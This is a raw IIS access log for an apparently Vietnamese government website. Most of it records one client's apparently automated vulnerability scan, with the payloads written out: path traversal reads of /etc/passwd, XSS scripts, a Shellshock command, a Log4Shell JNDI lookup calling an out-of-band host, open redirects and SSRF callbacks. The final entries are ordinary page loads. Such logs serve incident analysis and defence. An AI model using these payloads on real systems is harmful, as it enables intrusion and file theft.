2023-10-13 17:37:09 103.153.214.94 GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205
2023-10-13 17:37:11 103.153.214.94 GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 204
2023-10-13 17:37:48 103.153.214.94 GET /api/geojson url=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 218
2023-10-13 17:40:56 103.153.214.94 GET /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 211
2023-10-13 17:41:00 103.153.214.94 GET /fmangersub cpath=../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 206
2023-10-13 17:47:49 103.153.214.94 POST /viewlog.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 813
2023-10-13 17:48:06 103.153.214.94 POST /autodiscover/autodiscover.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 211
2023-10-13 17:50:10 103.153.214.94 GET /WEB-INF/classes/META-INF/microprofile-config.properties - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 232
2023-10-13 17:51:34 103.153.214.94 POST /delete_cart_goods.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 208
2023-10-13 17:52:25 103.153.214.94 GET /sync/dropbox/download challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 210
2023-10-13 17:54:14 103.153.214.94 GET /cgi-bin/broker csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 210
2023-10-13 17:55:17 103.153.214.94 POST /action.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 207
2023-10-13 17:55:55 103.153.214.94 POST /homeaction.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 210
2023-10-13 17:57:31 103.153.214.94 POST /cgi 2 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 http://bcvt.kontum.gov.vn/mainFrame.htm 405 0 1 206
2023-10-13 17:57:33 103.153.214.94 POST /cgi 7 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 http://bcvt.kontum.gov.vn/mainFrame.htm 405 0 1 203
2023-10-13 17:57:45 103.153.214.94 POST /index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 810
2023-10-13 17:57:47 103.153.214.94 POST /TransferredOutModal.php modfunc=detail 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 204
2023-10-13 17:58:35 103.153.214.94 GET /auth/logout continue=//interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208
2023-10-13 17:59:28 103.153.214.94 GET /lostpassword.php/n4gap"><img+src=a+onerror=alert("document.domain")> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 210
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-10-13 18:01:32
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-10-13 18:01:32 103.153.214.94 POST /api/graphql - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/-/graphql-explorer 404 0 2 231
2023-10-13 18:02:38 103.153.214.94 GET /plugins/wordpress_sso/pages/index.php wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 207
2023-10-13 18:05:51 103.153.214.94 GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><SVG+ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>.asp - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 212
2023-10-13 18:07:33 103.153.214.94 GET /cgi-bin/slogin/login.py - 443 - 193.123.37.162 ()+{+:;+};+echo+;+echo+;+/bin/cat+/etc/passwd - 200 0 0 209
2023-10-13 18:08:40 103.153.214.94 POST /sitecore/shell/ClientBin/Reporting/Report.ashx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 212
2023-10-13 18:10:27 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 216
2023-10-13 18:12:59 103.153.214.94 GET /NetBiblio/search/shortview searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 18:13:01 103.153.214.94 GET /NetBiblio/search/shortview searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205
2023-10-13 18:13:05 103.153.214.94 GET /ie50/system/login/SysLoginUser.aspx Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203
2023-10-13 18:13:07 103.153.214.94 GET /system/login/SysLoginUser.aspx Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 18:15:08 103.153.214.94 POST /cas/v1/tickets/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 207
2023-10-13 18:15:14 103.153.214.94 GET /wan.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 18:15:27 103.153.214.94 GET /ie50/system/login/SysLoginUser.aspx Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 18:15:29 103.153.214.94 GET /system/login/SysLoginUser.aspx Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 209
2023-10-13 18:19:43 103.153.214.94 GET /fmlurlsvc/ url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 212
2023-10-13 18:20:15 103.153.214.94 GET /login.htm - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 210
2023-10-13 18:20:17 103.153.214.94 GET /formLoginAuth.htm authCode=1&userName=admin&goURL&action=login 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203
2023-10-13 18:22:00 103.153.214.94 GET /go/add-on/business-continuity/api/plugin folderName&pluginName=../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 213
2023-10-13 18:24:03 103.153.214.94 GET /elFinder/php/connector.minimal.php cmd=mkfile&target=l1_Lw&name=2WfF0WtexAVYWgCIgeAhNr8XN49.php:aaa 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 214
2023-10-13 18:27:30 103.153.214.94 POST /classes/Login.php f=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 210
2023-10-13 18:27:33 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 440
2023-10-13 18:30:18 103.153.214.94 GET / data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 219
2023-10-13 18:30:22 103.153.214.94 GET / format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 209
2023-10-13 18:30:24 103.153.214.94 GET /atmail/ format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 18:30:26 103.153.214.94 GET /atmail/webmail/ format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204
2023-10-13 18:32:26 103.153.214.94 GET /getCorsFile urlPath=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 209
2023-10-13 18:32:28 103.153.214.94 GET /getCorsFile urlPath=file:///c://windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207
2023-10-13 18:35:36 103.153.214.94 GET /glpi/plugins/barcode/front/send.php file=../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 209
2023-10-13 18:37:37 103.153.214.94 GET /adm_program/system/redirect.php url=javascript://%250aalert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209
2023-10-13 18:37:51 103.153.214.94 GET /RestAPI/ImportTechnicians - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 206
2023-10-13 18:38:39 103.153.214.94 GET /;/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206
2023-10-13 18:38:41 103.153.214.94 GET /resin-doc/;/WEB-INF/resin-web.xml - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 209
2023-10-13 18:39:19 103.153.214.94 GET /registry/machine app=zBNvl&appType=0&version=0&hostname=iaadd&ip=ckjv7uic8b6p3donsoogqred9cy6k6zht.oast.online&port=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 209
2023-10-13 18:39:37 103.153.214.94 GET /goforms/menu - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 207
2023-10-13 18:42:00 103.153.214.94 GET / x=${jndi:ldap://${:-165}${:-354}.${hostName}.uri.ckjv7uic8b6p3donsoogrep48ogj1uazt.oast.online/a} 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 215
2023-10-13 18:42:18 103.153.214.94 POST /Side.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 811
2023-10-13 18:44:44 103.153.214.94 GET /STATE_ID/123/agentLogUploader - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 211
2023-10-13 18:44:44 103.153.214.94 GET /login/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207
2023-10-13 18:49:44 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 230
2023-10-13 18:50:18 103.153.214.94 GET /client/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 206
2023-10-13 18:52:02 103.153.214.94 GET /changePassword username=administrator 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 210
2023-10-13 18:53:35 103.153.214.94 GET /language/lang - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 234
2023-10-13 18:55:19 103.153.214.94 GET /lab.html vpath=//interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207
2023-10-13 18:56:39 103.153.214.94 GET /apisix/admin/migrate/export - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 2 238
2023-10-13 18:57:08 103.153.214.94 GET /templates/m/inc_head.php q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 220
2023-10-13 18:57:25 103.153.214.94 GET /goform/activate_process isv&akey&hostid&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 209
2023-10-13 18:58:34 103.153.214.94 GET /services/pluginscript/..;/..;/..;/getFavicon host=ckjv7uic8b6p3donsoogryzai7h6x7p1p.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 215
2023-10-13 18:59:46 103.153.214.94 GET /2WfF0jDQnvsgrYx9Ul7AeWra8aU.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 215
2023-10-13 18:59:48 103.153.214.94 PUT /2WfF0jDQnvsgrYx9Ul7AeWra8aU.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 212
2023-10-13 18:59:50 103.153.214.94 GET /2WfF0jDQnvsgrYx9Ul7AeWra8aU.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207
2023-10-13 19:00:12 103.153.214.94 GET /services/pluginscript/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205
2023-10-13 19:00:14 103.153.214.94 GET /services/pluginscript/..;/..;/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204
2023-10-13 19:00:17 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 226
2023-10-13 19:04:10 103.153.214.94 GET / - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 289
2023-10-13 19:04:11 103.153.214.94 GET /runtime-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 902
2023-10-13 19:04:14 103.153.214.94 GET /polyfills-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2863
2023-10-13 19:04:22 103.153.214.94 GET /styles-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 7226
2023-10-13 19:04:49 103.153.214.94 GET /vendor-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 27599
2023-10-13 19:04:51 103.153.214.94 GET /main-es5.js - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1131
2023-10-13 19:05:00 103.153.214.94 GET /data-table.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:00 103.153.214.94 GET /data-table.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 275
2023-10-13 19:05:00 103.153.214.94 GET /data-table.woff - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 275
2023-10-13 19:05:01 103.153.214.94 GET /data-table.ttf - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:01 103.153.214.94 GET /data-table.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:01 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 273
2023-10-13 19:05:03 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 316
2023-10-13 19:05:03 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:03 103.153.214.94 GET /ui-icons_222222_256x240.png - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 274
2023-10-13 19:05:05 103.153.214.94 GET /Avenir_Next_W00_400.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1363
2023-10-13 19:05:05 103.153.214.94 GET /Avenir_Next_W00_400.woff2 - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 545
2023-10-13 19:05:06 103.153.214.94 GET /Avenir_Next_W00_400.woff - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 617
2023-10-13 19:05:08 103.153.214.94 GET /Avenir_Next_W00_400.ttf - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1361
2023-10-13 19:05:10 103.153.214.94 GET /Avenir_Next_W00_400.svg - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2452
2023-10-13 19:05:10 103.153.214.94 GET /Avenir_Next_W00_Italic_400.eot - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 548
2023-10-13 19:05:11 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff2 - 443 - 198.240.127.124 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 547
